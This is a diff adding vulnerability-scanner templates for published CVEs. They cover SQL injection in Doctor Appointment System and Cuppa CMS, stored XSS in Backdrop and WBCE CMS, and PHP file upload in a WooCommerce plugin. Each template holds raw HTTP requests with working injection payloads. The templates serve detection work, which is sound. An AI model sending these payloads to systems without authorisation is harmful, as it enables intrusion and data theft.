diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml
new file mode 100644
index 0000000000..fb291a6506
--- /dev/null
+++ b/http/cves/2021/CVE-2021-27314.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-27314
+
+info:
+ name: Doctor Appointment System 1.0 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page.
+ reference:
+ - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
+ - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27314
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-27314
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,sqli,doctor-appointment-system
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /admin/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(body, "Doctor Appoinment System")'
+ condition: and
diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml
new file mode 100644
index 0000000000..9b7fe7d367
--- /dev/null
+++ b/http/cves/2021/CVE-2021-27315.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-27315
+
+info:
+ name: Doctor Appointment System 1.0 - SQL Injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.
+ reference:
+ - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
+ - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27315
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-27315
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,sqli,doctor-appointment-system
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /contactus.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 500'
+ - 'contains(body, "Medical Management System")'
+ condition: and
diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml
new file mode 100644
index 0000000000..c19fa1113c
--- /dev/null
+++ b/http/cves/2021/CVE-2021-27316.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-27316
+
+info:
+ name: Doctor Appointment System 1.0 - SQL Injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter.
+ reference:
+ - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
+ - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27316
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-27316
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,sqli,doctor-appointment-system
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /contactus.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ firstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 500'
+ - 'contains(body, "Medical Management System")'
+ condition: and
diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml
new file mode 100644
index 0000000000..a9c97c5ba9
--- /dev/null
+++ b/http/cves/2021/CVE-2021-27319.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-27319
+
+info:
+ name: Doctor Appointment System 1.0 - SQL Injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter.
+ reference:
+ - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
+ - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27319
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-27319
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,sqli,doctor-appointment-system
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /contactus.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 500'
+ - 'contains(body, "Medical Management System")'
+ condition: and
diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml
new file mode 100644
index 0000000000..3eb3155867
--- /dev/null
+++ b/http/cves/2021/CVE-2021-27320.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-27320
+
+info:
+ name: Doctor Appointment System 1.0 - SQL Injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.
+ reference:
+ - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
+ - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27320
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-27320
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,sqli,doctor-appointment-system
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /contactus.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ firstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 500'
+ - 'contains(body, "Medical Management System")'
+ condition: and
diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml
new file mode 100644
index 0000000000..cd008f2a0b
--- /dev/null
+++ b/http/cves/2022/CVE-2022-24264.yaml
@@ -0,0 +1,57 @@
+id: CVE-2022-24264
+
+info:
+ name: Cuppa CMS v1.0 - SQL injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
+ reference:
+ - https://github.com/CuppaCMS/CuppaCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24264
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-24264
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cuppa,authenticated
+
+variables:
+ num: '999999999'
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ user={{username}}&password={{password}}&language=en&task=login
+
+ - |
+ POST /components/table_manager/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ search_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_2
+ words:
+ - '{{md5(num)}}'
+ - 'td_available_languages'
+ condition: and
+
+ - type: word
+ part: header_2
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml
new file mode 100644
index 0000000000..ade4412978
--- /dev/null
+++ b/http/cves/2022/CVE-2022-24265.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-24265
+
+info:
+ name: Cuppa CMS v1.0 - SQL injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
+ reference:
+ - https://github.com/CuppaCMS/CuppaCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24265
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-24265
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cuppa,authenticated
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ user={{username}}&password={{password}}&language=en&task=login
+
+ - |
+ @timeout: 20s
+ POST /components/menu/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "menu/html/edit.php")'
+ condition: and
diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml
new file mode 100644
index 0000000000..fd8db28259
--- /dev/null
+++ b/http/cves/2022/CVE-2022-24266.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-24266
+
+info:
+ name: Cuppa CMS v1.0 - SQL injection
+ author: theamanrawat
+ severity: high
+ description: |
+ Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.
+ reference:
+ - https://github.com/CuppaCMS/CuppaCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24266
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-24266
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cuppa,authenticated
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ user={{username}}&password={{password}}&language=en&task=login
+
+ - |
+ @timeout: 20s
+ POST /components/table_manager/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ order_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "list_admin_table")'
+ condition: and
diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml
new file mode 100644
index 0000000000..c979eab562
--- /dev/null
+++ b/http/cves/2022/CVE-2022-27984.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-27984
+
+info:
+ name: Cuppa CMS v1.0 - SQL injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.
+ reference:
+ - https://github.com/CuppaCMS/CuppaCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-27984
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-27984
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cuppa,authenticated
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ user={{username}}&password={{password}}&language=en&task=login
+
+ - |
+ @timeout: 20s
+ POST /templates/default/html/windows/right.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ menu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "components/menu/classes/functions.php")'
+ condition: and
diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml
new file mode 100644
index 0000000000..2965631039
--- /dev/null
+++ b/http/cves/2022/CVE-2022-27985.yaml
@@ -0,0 +1,55 @@
+id: CVE-2022-27985
+
+info:
+ name: Cuppa CMS v1.0 - SQL injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.
+ reference:
+ - https://github.com/CuppaCMS/CuppaCMS
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-27985
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-27985
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cuppa,authenticated
+
+variables:
+ num: '999999999'
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ user={{username}}&password={{password}}&language=en&task=login
+
+ - |
+ POST /alerts/alertLightbox.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile¶ms%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-¶ms%5Breference%5D=41&uniqueClass=new_content_3983163
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5(num)}}'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml
new file mode 100644
index 0000000000..e5fbe88025
--- /dev/null
+++ b/http/cves/2022/CVE-2022-42095.yaml
@@ -0,0 +1,80 @@
+id: CVE-2022-42095
+
+info:
+ name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
+ author: theamanrawat
+ severity: medium
+ description: |
+ Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.
+ reference:
+ - https://github.com/backdrop/backdrop/releases/tag/1.23.0
+ - https://github.com/bypazs/CVE-2022-42095
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-42095
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2022-42095
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,xss,cms,backdrop,authenticated
+
+http:
+ - raw:
+ - |
+ GET /?q=user/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?q=user/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
+
+ - |
+ GET /?q=node/add/page HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?q=node/add/page HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ title={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save
+
+ - |
+ POST /?q={{randstr}} HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_5 == 200"
+ - "contains(all_headers_5, 'text/html')"
+ - 'contains(body_5, "![](\"x\")
")'
+ - "contains(body_5, 'Backdrop CMS')"
+ condition: and
+
+ extractors:
+ - type: regex
+ name: form_id_1
+ group: 1
+ regex:
+ - 'name="form_build_id" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: form_id_2
+ group: 1
+ regex:
+ - 'name="form_build_id" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: form_token
+ group: 1
+ regex:
+ - 'name="form_token" value="(.*)"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml
new file mode 100644
index 0000000000..20edd67050
--- /dev/null
+++ b/http/cves/2022/CVE-2022-42096.yaml
@@ -0,0 +1,185 @@
+id: CVE-2022-42096
+
+info:
+ name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
+ author: theamanrawat
+ severity: medium
+ description: |
+ Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.
+ reference:
+ - https://github.com/backdrop/backdrop/releases/tag/1.23.0
+ - https://github.com/bypazs/CVE-2022-42096
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-42096
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2022-42096
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,xss,cms,backdrop,authenticated
+
+http:
+ - raw:
+ - |
+ GET /?q=user/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?q=user/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
+
+ - |
+ GET /?q=node/add/post HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?q=node/add/post HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="title"
+
+ {{randstr}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="field_tags[und]"
+
+ {{randstr}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="body[und][0][summary]"
+
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="body[und][0][value]"
+
+ 
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="body[und][0][format]"
+
+ full_html
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
+ Content-Type: application/octet-stream
+
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="field_image[und][0][fid]"
+
+ 0
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="field_image[und][0][display]"
+
+ 1
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="changed"
+
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="form_build_id"
+
+ {{form_id_1}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="form_token"
+
+ {{form_token}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="form_id"
+
+ {{form_id_2}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="status"
+
+ 1
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="scheduled[date]"
+
+ 2023-04-25
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="scheduled[time]"
+
+ 16:59:23
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="promote"
+
+ 1
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="name"
+
+ {{name}}
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="date[date]"
+
+ 2023-04-24
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="date[time]"
+
+ 16:59:23
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="path[auto]"
+
+ 1
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="comment"
+
+ 2
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="additional_settings__active_tab"
+
+
+ ------WebKitFormBoundaryIubltUxssi0yqDjp
+ Content-Disposition: form-data; name="op"
+
+ Save
+ ------WebKitFormBoundaryIubltUxssi0yqDjp--
+
+ - |
+ GET /?q=posts/{{randstr}} HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+ - 'Backdrop CMS'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: form_id_1
+ group: 1
+ regex:
+ - 'name="form_build_id" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: name
+ group: 1
+ regex:
+ - 'name="name" value="(.*?)"'
+ internal: true
+
+ - type: regex
+ name: form_id_2
+ group: 1
+ regex:
+ - 'name="form_id" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: form_token
+ group: 1
+ regex:
+ - 'name="form_token" value="(.*)"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml
new file mode 100644
index 0000000000..4c754a853b
--- /dev/null
+++ b/http/cves/2022/CVE-2022-4328.yaml
@@ -0,0 +1,56 @@
+id: CVE-2022-4328
+
+info:
+ name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
+ author: theamanrawat
+ severity: critical
+ description: |
+ The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
+ remediation: Fixed in version 18.0
+ reference:
+ - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
+ - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-4328
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-4328
+ cwe-id: CWE-434
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,rce,wordpress,wp-plugin,wp,n-media-woocommerce-checkout-fields
+
+http:
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597
+
+ --------------------------22728be7b3104597
+ Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
+ Content-Type: application/octet-stream
+
+
+
+ --------------------------22728be7b3104597--
+
+ - |
+ GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "fe5df26ce4ca0056ffae8854469c282f"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml
new file mode 100644
index 0000000000..9771d90a5a
--- /dev/null
+++ b/http/cves/2022/CVE-2022-45037.yaml
@@ -0,0 +1,100 @@
+id: CVE-2022-45037
+
+info:
+ name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
+ author: theamanrawat
+ severity: medium
+ description: |
+ A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.
+ reference:
+ - https://github.com/WBCE/WBCE_CMS
+ - https://shimo.im/docs/dPkpKPQEjXfvYoqO/read
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-45037
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-45037
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,xss,wbce,cms,authenticated
+
+http:
+ - raw:
+ - |
+ GET /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
+
+ - |
+ GET /admin/users/index.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/users/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ formtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
+
+ - |
+ GET /admin/users/ HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_5
+ words:
+ - ""
+ - "SESSION_TIMEOUT"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: username_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="username_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: password_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="password_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: formtoken
+ part: body
+ group: 1
+ regex:
+ - 'name="formtoken" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: username_fieldname_2
+ part: body
+ group: 1
+ regex:
+ - 'name="username_fieldname" value="(.*)"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml
new file mode 100644
index 0000000000..7009de52f6
--- /dev/null
+++ b/http/cves/2022/CVE-2022-45038.yaml
@@ -0,0 +1,100 @@
+id: CVE-2022-45038
+
+info:
